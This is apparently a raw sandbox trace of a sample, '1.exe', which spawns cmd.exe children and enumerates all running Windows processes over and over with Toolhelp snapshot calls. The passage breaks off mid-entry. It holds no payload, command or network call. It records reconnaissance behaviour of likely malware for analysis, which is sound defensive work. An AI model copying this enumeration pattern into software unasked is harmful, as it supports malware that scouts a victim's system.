1 [0044.878] Process32NextW (in: hSnapshot=0x2c0, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0044.879] Process32NextW (in: hSnapshot=0x2c0, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x834, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0044.880] Process32NextW (in: hSnapshot=0x2c0, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0044.880] Process32NextW (in: hSnapshot=0x2c0, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0044.881] Process32NextW (in: hSnapshot=0x2c0, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0044.882] Process32NextW (in: hSnapshot=0x2c0, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0044.882] Process32NextW (in: hSnapshot=0x2c0, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0044.883] Process32NextW (in: hSnapshot=0x2c0, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0044.883] Process32NextW (in: hSnapshot=0x2c0, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="OfficeC2RClient.exe")) returned 1 [0044.884] Process32NextW (in: hSnapshot=0x2c0, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0044.885] Process32NextW (in: hSnapshot=0x2c0, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="OfficeC2RClient.exe")) returned 1 [0044.885] Process32NextW (in: hSnapshot=0x2c0, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0044.886] Process32NextW (in: hSnapshot=0x2c0, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0044.887] Process32NextW (in: hSnapshot=0x2c0, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0044.887] Process32NextW (in: hSnapshot=0x2c0, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0044.896] Process32NextW (in: hSnapshot=0x2c0, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="AppHostRegistrationVerifier.exe")) returned 1 [0044.896] Process32NextW (in: hSnapshot=0x2c0, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0044.897] Process32NextW (in: hSnapshot=0x2c0, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="screensaver-fireplace.exe")) returned 1 [0044.898] Process32NextW (in: hSnapshot=0x2c0, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="upperarcobviously.exe")) returned 1 [0044.929] Process32NextW (in: hSnapshot=0x2c0, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="sets.exe")) returned 1 [0044.930] Process32NextW (in: hSnapshot=0x2c0, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x46c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="lottery.exe")) returned 1 [0044.930] Process32NextW (in: hSnapshot=0x2c0, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="meanwhile.exe")) returned 1 [0044.931] Process32NextW (in: hSnapshot=0x2c0, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="mhz-archived-deemed.exe")) returned 1 [0044.931] Process32NextW (in: hSnapshot=0x2c0, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="compare-hh.exe")) returned 1 [0044.932] Process32NextW (in: hSnapshot=0x2c0, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xce4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="forgotten.exe")) returned 1 [0044.933] Process32NextW (in: hSnapshot=0x2c0, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x654, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="organization-tail.exe")) returned 1 [0044.933] Process32NextW (in: hSnapshot=0x2c0, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="das.exe")) returned 1 [0044.934] Process32NextW (in: hSnapshot=0x2c0, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="mixture.exe")) returned 1 [0044.935] Process32NextW (in: hSnapshot=0x2c0, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="federation customs.exe")) returned 1 [0044.936] Process32NextW (in: hSnapshot=0x2c0, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="boating.exe")) returned 1 [0044.937] Process32NextW (in: hSnapshot=0x2c0, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="manager.exe")) returned 1 [0044.937] Process32NextW (in: hSnapshot=0x2c0, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="favors_disagree.exe")) returned 1 [0044.938] Process32NextW (in: hSnapshot=0x2c0, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="grove_fame_lightning.exe")) returned 1 [0044.939] Process32NextW (in: hSnapshot=0x2c0, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="camel.exe")) returned 1 [0044.940] Process32NextW (in: hSnapshot=0x2c0, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="shoot_click_charter.exe")) returned 1 [0044.940] Process32NextW (in: hSnapshot=0x2c0, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="md-upgrading.exe")) returned 1 [0044.941] Process32NextW (in: hSnapshot=0x2c0, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="conservative warnings.exe")) returned 1 [0044.942] Process32NextW (in: hSnapshot=0x2c0, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="indonesian.exe")) returned 1 [0044.943] Process32NextW (in: hSnapshot=0x2c0, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0044.944] Process32NextW (in: hSnapshot=0x2c0, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xfcc, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0044.944] Process32NextW (in: hSnapshot=0x2c0, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xfa4, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0044.945] Process32NextW (in: hSnapshot=0x2c0, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="1.exe")) returned 1 [0044.946] Process32NextW (in: hSnapshot=0x2c0, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xc48, pcPriClassBase=8, dwFlags=0x0, szExeFile="1.exe")) returned 1 [0044.946] Process32NextW (in: hSnapshot=0x2c0, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0044.947] Process32NextW (in: hSnapshot=0x2c0, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xc48, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0044.948] Process32NextW (in: hSnapshot=0x2c0, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xc48, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0044.949] Process32NextW (in: hSnapshot=0x2c0, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0044.949] Process32NextW (in: hSnapshot=0x2c0, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0044.950] Process32NextW (in: hSnapshot=0x2c0, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xef4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x12c, pcPriClassBase=4, dwFlags=0x0, szExeFile="CompatTelRunner.exe")) returned 1 [0044.951] Process32NextW (in: hSnapshot=0x2c0, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xef4, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0044.952] Process32NextW (in: hSnapshot=0x2c0, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xef4, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0044.952] CloseHandle (hObject=0x2c0) returned 1 [0044.952] Sleep (dwMilliseconds=0x1f4) [0045.661] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x300 [0045.668] Process32FirstW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0045.668] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6b, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0045.676] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0045.677] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x19c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0045.677] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0045.678] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0045.678] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0045.679] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0045.680] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0045.680] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0045.681] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x234, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0045.682] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0045.682] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0045.683] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x374, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x234, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0045.684] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5a, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0045.684] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0045.685] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0045.686] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0045.687] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x25, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0045.687] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0045.688] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0045.688] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0045.689] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0045.690] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0045.690] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0045.691] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0045.692] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x4fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0045.692] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0045.693] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x718, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0045.694] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0045.694] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, 